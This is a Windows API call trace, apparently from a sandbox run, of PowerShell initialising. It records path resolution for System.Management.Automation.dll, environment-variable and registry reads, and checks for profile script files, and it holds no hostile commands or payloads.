	[0620.292] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0620.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.292] CoTaskMemFree (pv=0x2a8450) 
	[0620.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.298] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0620.299] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0620.299] CoTaskMemFree (pv=0x2a8450) 
	[0620.299] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0620.299] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0620.299] CoTaskMemFree (pv=0x2a8450) 
	[0620.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.301] GetCurrentProcessId () returned 0x5b4
	[0620.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0620.305] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4d8 | out: phkResult=0xcd4d8*=0x388) returned 0x0
	[0620.305] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd45c, lpData=0x0, lpcbData=0xcd458*=0x0 | out: lpType=0xcd45c*=0x1, lpData=0x0, lpcbData=0xcd458*=0x56) returned 0x0
	[0620.305] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e2500
	[0620.305] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd42c, lpData=0x1b3e2500, lpcbData=0xcd428*=0x56 | out: lpType=0xcd42c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd428*=0x56) returned 0x0
	[0620.305] CoTaskMemFree (pv=0x1b3e2500) 
	[0620.305] RegCloseKey (hKey=0x388) returned 0x0
	[0620.307] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0620.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.307] CoTaskMemFree (pv=0x2a8450) 
	[0621.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.351] VirtualQuery (in: lpAddress=0xcb530, lpBuffer=0xcc3f0, dwLength=0x30 | out: lpBuffer=0xcc3f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0621.358] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0621.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0621.358] CoTaskMemFree (pv=0x2a8450) 
	[0622.258] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.258] CoTaskMemFree (pv=0x2a8450) 
	[0622.258] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.259] CoTaskMemFree (pv=0x2a8450) 
	[0622.259] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.259] CoTaskMemFree (pv=0x2a8450) 
	[0622.265] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.265] CoTaskMemFree (pv=0x2a8450) 
	[0622.271] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.271] CoTaskMemFree (pv=0x2a8450) 
	[0622.273] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0622.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.273] CoTaskMemFree (pv=0x2a8450) 
	[0622.279] VirtualQuery (in: lpAddress=0xcb530, lpBuffer=0xcc3f0, dwLength=0x30 | out: lpBuffer=0xcc3f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0625.306] VirtualQuery (in: lpAddress=0xcb530, lpBuffer=0xcc3f0, dwLength=0x30 | out: lpBuffer=0xcc3f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0625.316] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0625.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.316] CoTaskMemFree (pv=0x2a8450) 
	[0628.030] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a8890
	[0628.035] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a89a0
	[0638.497] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0638.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.497] CoTaskMemFree (pv=0x2a8ab0) 
	[0638.501] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0638.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.501] CoTaskMemFree (pv=0x2a8ab0) 
	[0638.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.444] VirtualQuery (in: lpAddress=0xcb7e0, lpBuffer=0xcc6a0, dwLength=0x30 | out: lpBuffer=0xcc6a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0640.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd638 | out: phkResult=0xcd638*=0x394) returned 0x0
	[0640.451] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5bc, lpData=0x0, lpcbData=0xcd5b8*=0x0 | out: lpType=0xcd5bc*=0x1, lpData=0x0, lpcbData=0xcd5b8*=0x56) returned 0x0
	[0640.451] CoTaskMemAlloc (cb=0x5a) returned 0x1b3ffd90
	[0640.451] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd58c, lpData=0x1b3ffd90, lpcbData=0xcd588*=0x56 | out: lpType=0xcd58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd588*=0x56) returned 0x0
	[0640.451] CoTaskMemFree (pv=0x1b3ffd90) 
	[0640.451] RegCloseKey (hKey=0x394) returned 0x0
	[0640.451] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd638 | out: phkResult=0xcd638*=0x394) returned 0x0
	[0640.451] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5bc, lpData=0x0, lpcbData=0xcd5b8*=0x0 | out: lpType=0xcd5bc*=0x1, lpData=0x0, lpcbData=0xcd5b8*=0x56) returned 0x0
	[0640.451] CoTaskMemAlloc (cb=0x5a) returned 0x1b3ffd90
	[0640.451] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd58c, lpData=0x1b3ffd90, lpcbData=0xcd588*=0x56 | out: lpType=0xcd58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd588*=0x56) returned 0x0
	[0640.451] CoTaskMemFree (pv=0x1b3ffd90) 
	[0640.451] RegCloseKey (hKey=0x394) returned 0x0
	[0640.452] CoTaskMemAlloc (cb=0x20c) returned 0x1b3d1a30
	[0640.452] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3d1a30 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0640.452] CoTaskMemFree (pv=0x1b3d1a30) 
	[0640.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0640.452] CoTaskMemAlloc (cb=0x20c) returned 0x1b3d1a30
	[0640.452] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3d1a30 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0640.452] CoTaskMemFree (pv=0x1b3d1a30) 
	[0640.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0640.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0640.453] SetErrorMode (uMode=0x1) returned 0x1
	[0640.453] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0640.454] SetErrorMode (uMode=0x1) returned 0x1
	[0640.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0640.454] SetErrorMode (uMode=0x1) returned 0x1
